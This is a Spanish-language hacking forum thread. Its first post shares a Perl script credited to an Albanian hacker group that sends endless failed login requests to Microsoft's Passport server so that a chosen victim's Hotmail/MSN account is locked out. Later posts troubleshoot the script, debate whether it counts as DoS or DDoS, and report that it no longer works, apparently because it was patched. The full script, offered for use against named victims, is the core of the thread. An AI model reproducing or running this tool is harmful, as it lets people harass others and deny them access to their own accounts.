DDOS a cuentas Hotmail - Exploit in Perl

[CiberPunk]

Bueno esto tamien es un exploit reciente para bloquear cuentas de hotmail.
Simpleente ejecuntenlo con el Active Perl 5.8. De eso ya deben saber.

Bien para los amantes del Perl, aca el codigo:

Código:

#!/usr/bin/perl
#
# Founded by: ScorpioNy
# Original made by :ScorpioNy   
# 1 Janar 2006
# Albanian Hackers a.k.a AlboZ TeaM
# www.alboz.net
#
#
# Advizory: You must start atacking beafore the victime connect to msn messenger .
# When the atack start the victim can`t connect to msn messenger or email inbox ...
# He can connect only when she change the password from the secret answer or alternative email....
#
#
# Nice Hack...

use IO::Socket;

if(!defined($ARGV[0])) {

system (clear);
print "\n";
print "=================================================\n";
print "--- MSN Passport accounts remote DoS founded by ScorpioNy\n";
print "--- Albanian Hackers a.k.a AlboZ TeaM\n";
print "=================================================\n";
print "--- How to Use: perl $0 <Victim@hotmail.com>\n\n";
exit; }

$TARGET        = $ARGV[0];
$PORT          = "80";
$SERVER        = "login.passport.com";
$PASSWORD      = "FUCKMSN"; # MSNs nobody like them, fux0r them ... ;>
$KEYS          = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7";
$NUMBER        = "99999999999999999999999999999999999999999999999999999";

#################################

$COMMAND1      = "GET /login2.srf HTTP/1.0";
$COMMAND2      = "Accept: */*";
$COMMAND3      = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";



print "=================================================\n";
print "--- MSN Passport accounts remote DoS founded by ScorpioNy\n";
print "--- Albanian Hackers a.k.a AlboZ TeaM\n";
print "=================================================\n";
print "[+] Atacking. $TARGET ...\n";
print "[-] CTRL + C Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
$remote->autoflush();
}
print "Finish.. try again if you want";

Si notan un error, pues hagan esto:

error code in:

Código:

system (clear);

por esto:

Código:

system (cls);

mas claro que el agua no hay.

Greetings:::

[OzX]

es lo mismo que los multi msn nuke?
hace consante peticiones de contraseña y por eso hace denegacion de servicio

pero no creo que sea DDoS, porque tienes que tener zombie o esclavos que ejecuten este mismo exploit y basta con uno solo, por eso es un DoS, denial of service de un solo pc local al remoto...

DoS                PC ------------------\----------------->victima
                             peticiones       denegeacion


y DDOS


bueno es solo para aclarar.

[CiberPunk]

Pues es clara tu aclaracion pero, esto lo publique para los que hacen exploits en perl, o al menos son unos fans del perl, yo por mi parte uso el perl XD.

uno de los codigos para generar la denegacion es:

Código:

$NUMBER        = "99999999999999999999999999999999999999999999999999999";

Ademas hay un Poc, que esta en fase alpha debido a que no funciona por algunas fallas en el code, las ideas son minimas, o el supuesto codigo que deberia ser remplazado es esta:

Código:

$KEYS          = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7";
$NUMBER        = "99999999999999999999999999999999999999999999999999999";

y por ultimo este otro:

Código:

$COMMAND3      = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";

Bueno en fin conozco varios programas para DDos, muy lamer por cierto por lo qu yo prefiero usar es en line de comandos mismo Linux.

Greetings:::

[Belerofonte]

Hola miren lo inperprete con el perl y no me andubo , cambie system (clear); por system (cls);
y nada no funciona miren les dejo una imagen
estoy desconsertado

salu2 y espero respuestas



Belerofonte

[OzX]

no entiendo cual es la duda¿?¿?¿? en la foto dice que tienes q presionar control+Cpara detener esto , el exploit hace una DOS a las cuentas haciendoles continuas peticiones de contraseña en conclucion las bloquea... tienes q mantener esa ventana todo el tiempo q kieras que la cuenta kede bloqueada.

[Belerofonte]

Si el problema es que puedo entrar a la cuenta perfectamente
la probe con mi cuenta y nada
salu2 y espero mas respuestas




Belerofonte

[CiberPunk]

Pues normalmente demora.

Ademas ya tiene buen tiempo publicado.

Greetings:::

[JanditoOo]

de donde puedo bajar el perl xa windows?

[OzX]

de donde puedo bajar el perl xa windows?

bloque exploit, interpretacion de exploit en perl

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,16809.0.html

[mapasteper]

HOLA.. YO probe el exploit!!! pero me dio el mensaje que no se puede conectar a login.passport .com

Al parecer llegue tarde a probar el exploit?? alguien lo ha probado recientemente???

[OzX]

este exploit ya es viejo.. deve estar parchado.. las cosas nuevas funcionan pero las cosas viejas no...

[;]

me gusta el exploit lo estudiare para entenderlo asi podre hacer modificaciones a mi gusto.

acabo de empezar con perl pero esto me ayudara